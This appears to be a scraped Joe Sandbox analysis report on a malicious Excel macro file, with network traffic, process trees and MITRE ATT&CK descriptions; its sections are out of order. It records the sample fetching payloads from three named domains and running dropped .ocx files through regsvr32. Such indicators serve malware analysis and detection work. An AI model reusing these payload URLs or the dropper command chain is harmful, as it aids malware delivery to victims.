Dec 2, 2021 14:36:11.637907028 CET	49757	443	192.168.2.5	162.241.2.78

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 2, 2021 14:36:05.943691015 CET	52441	53	192.168.2.5	8.8.8.8
Dec 2, 2021 14:36:05.961409092 CET	53	52441	8.8.8.8	192.168.2.5
Dec 2, 2021 14:36:07.408467054 CET	62176	53	192.168.2.5	8.8.8.8
Dec 2, 2021 14:36:07.426022053 CET	53	62176	8.8.8.8	192.168.2.5
Dec 2, 2021 14:36:09.831341982 CET	65296	53	192.168.2.5	8.8.8.8
Dec 2, 2021 14:36:09.979106903 CET	53	65296	8.8.8.8	192.168.2.5

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Dec 2, 2021 14:36:05.943691015 CET	192.168.2.5	8.8.8.8	0x6c94	Standard query (0)	greenflag.esp.br	A (IP address)	IN (0x0001)
Dec 2, 2021 14:36:07.408467054 CET	192.168.2.5	8.8.8.8	0xaff6	Standard query (0)	noithat117.vn	A (IP address)	IN (0x0001)
Dec 2, 2021 14:36:09.831341982 CET	192.168.2.5	8.8.8.8	0x9fd8	Standard query (0)	playsis.com.br	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Dec 2, 2021 14:36:05.961409092 CET	8.8.8.8	192.168.2.5	0x6c94	No error (0)	greenflag.esp.br	108.179.192.98	A (IP address)	IN (0x0001)
Dec 2, 2021 14:36:07.426022053 CET	8.8.8.8	192.168.2.5	0xaff6	No error (0)	noithat117.vn	103.28.36.171	A (IP address)	IN (0x0001)
Dec 2, 2021 14:36:09.979106903 CET	8.8.8.8	192.168.2.5	0x9fd8	No error (0)	playsis.com.br	162.241.2.78	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

greenflag.esp.br

noithat117.vn

playsis.com.br

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49740	108.179.192.98	443	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:36:06 UTC	0	OUT	GET /yuINdRbM/tiynh.html HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: greenflag.esp.br Connection: Keep-Alive
2021-12-02 13:36:07 UTC	0	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 13:36:06 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.5	49753	103.28.36.171	443	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:36:07 UTC	0	OUT	GET /TSh7GBeIR/tiynh.html HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: noithat117.vn Connection: Keep-Alive
2021-12-02 13:36:09 UTC	0	IN	HTTP/1.1 200 OK Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 0 Date: Thu, 02 Dec 2021 13:36:09 GMT Server: LiteSpeed Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.5	49757	162.241.2.78	443	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE

Timestamp	kBytes transferred	Direction	Data
2021-12-02 13:36:10 UTC	1	OUT	GET /qJSL1BN5V/tiynh.html HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: playsis.com.br Connection: Keep-Alive
2021-12-02 13:36:11 UTC	1	IN	HTTP/1.1 200 OK Date: Thu, 02 Dec 2021 13:36:10 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Content-Length: 0 Content-Type: text/html; charset=UTF-8

Code Manipulations

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: EXCEL.EXE PID: 2172 Parent PID: 792

General

Start time:	14:35:58
Start date:	02/12/2021
Path:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
Imagebase:	0x1390000
File size:	27110184 bytes
MD5 hash:	5D6638F2C8F8571C593999C58866007E
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6380 Parent PID: 2172

General

Start time:	14:36:11
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\besta.ocx
Imagebase:	0x11a0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6404 Parent PID: 2172

General

Start time:	14:36:12
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\bestb.ocx
Imagebase:	0x11a0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Analysis Process: regsvr32.exe PID: 6424 Parent PID: 2172

General

Start time:	14:36:12
Start date:	02/12/2021
Path:	C:\Windows\SysWOW64\regsvr32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\regsvr32.exe" C:\Datop\bestc.ocx
Imagebase:	0x11a0000
File size:	20992 bytes
MD5 hash:	426E7499F6A7346F0410DEAD0805586B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Chronological Activities

Disassembly

Code Analysis

Reset < >

Analysis Process: EXCEL.EXE PID: 2172 Parent PID: 792 EXCEL.EXECOMMON

Executed Functions

Non-executed Functions

Function 13315C98, Relevance: .4, Instructions: 369COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.488240309.000000001330A000.00000004.00000001.sdmp, Offset: 1330A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1330a000_EXCEL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c09e8a91115cddd2728ac7a792912da8fd5944172ff6141f45a2cb447a1cf1
Instruction ID: fb8f66b5306cebfe1bb7fdefe84540459bcc8a87de70aec97a7dc493e253c982
Opcode Fuzzy Hash: e0c09e8a91115cddd2728ac7a792912da8fd5944172ff6141f45a2cb447a1cf1
Instruction Fuzzy Hash: 0DB1616144E3D08FD71B9B748CA62943FB0AE47224B2E45EBC4C1CF4B7D22D581ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 13315CBE, Relevance: .3, Instructions: 330COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.488240309.000000001330A000.00000004.00000001.sdmp, Offset: 1330A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1330a000_EXCEL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc200edd4fbf5f95e9bed7b983464b994238c827171761e5674a247ff429b86a
Instruction ID: 7cfd9929759fa81c045c60052bac9595f856aec81f5c91170011cf518be30aba
Opcode Fuzzy Hash: fc200edd4fbf5f95e9bed7b983464b994238c827171761e5674a247ff429b86a
Instruction Fuzzy Hash: B5A1606144E3D08FD71B5B348CA52953FB0AE43614B2E48EBC8C1CF4B7D22D581ADB62

Uniqueness

Uniqueness Score: -1.00%

Function 133135EB, Relevance: .3, Instructions: 316COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.488240309.000000001330A000.00000004.00000001.sdmp, Offset: 1330A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1330a000_EXCEL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 21d22fa572ddf26c225dc0862331a5eee902ed22e79fb19631c37f9a627edb77
Instruction ID: 6174c6c1649daf8afcd16c97a7b40a5b644cdb6da6e60df66e9e50d2f21933e3
Opcode Fuzzy Hash: 21d22fa572ddf26c225dc0862331a5eee902ed22e79fb19631c37f9a627edb77
Instruction Fuzzy Hash: 11B17F3114E3D08FC71B8B758CA16957FB1AE8322071A45EBD4C2CF9B7D2685819CB63

Uniqueness

Uniqueness Score: -1.00%

Function 133178AF, Relevance: .1, Instructions: 133COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.488240309.000000001330A000.00000004.00000001.sdmp, Offset: 1330A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1330a000_EXCEL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 34e7d4026b0d650919d03b44e92fbb58561fbba7a21f6c0665561acf3a17f83c
Instruction ID: dbf9110368021e9ffa0068afc9567b2943c5434542637c46feddac8417ec77ec
Opcode Fuzzy Hash: 34e7d4026b0d650919d03b44e92fbb58561fbba7a21f6c0665561acf3a17f83c
Instruction Fuzzy Hash: 3441D37640A7D08FE703C739DCA5B413F71AF53215B0E46D7C4808F1ABE668291ACB66

Uniqueness

Uniqueness Score: -1.00%

Function 13313938, Relevance: .1, Instructions: 61COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000003.488240309.000000001330A000.00000004.00000001.sdmp, Offset: 1330A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_3_1330a000_EXCEL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cdaa73d9f4ce5aea4530acae05c8b8c5ef78d2df0b1b9d32926df9f1ff79820
Instruction ID: f04afc466121fd537933103cb728e4c23b26a320304023b068a48ef75cba5022
Opcode Fuzzy Hash: 5cdaa73d9f4ce5aea4530acae05c8b8c5ef78d2df0b1b9d32926df9f1ff79820
Instruction Fuzzy Hash: 3121F93004E3E19FD72B9B3498A13917FF4AF47621F1A42E7D481CE8B7D2680949C762

Uniqueness

Uniqueness Score: -1.00%

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report counter-1248368226.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Overview

Initial Sample

Dropped Files

Sigma Overview

System Summary:

Jbx Signature Overview

AV Detection:

Compliance:

Software Vulnerabilities:

Networking:

System Summary:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

HIPS / PFW / Operating System Protection Evasion:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "counter-1248368226.xls"

Indicators

Summary

Document Summary

Streams

Stream Path: \x5DocumentSummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: \x5SummaryInformation, File Type: data, Stream Size: 4096

General

Stream Path: Workbook, File Type: Applesoft BASIC program data, first line number 16, Stream Size: 121786

General

Macro 4.0 Code

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph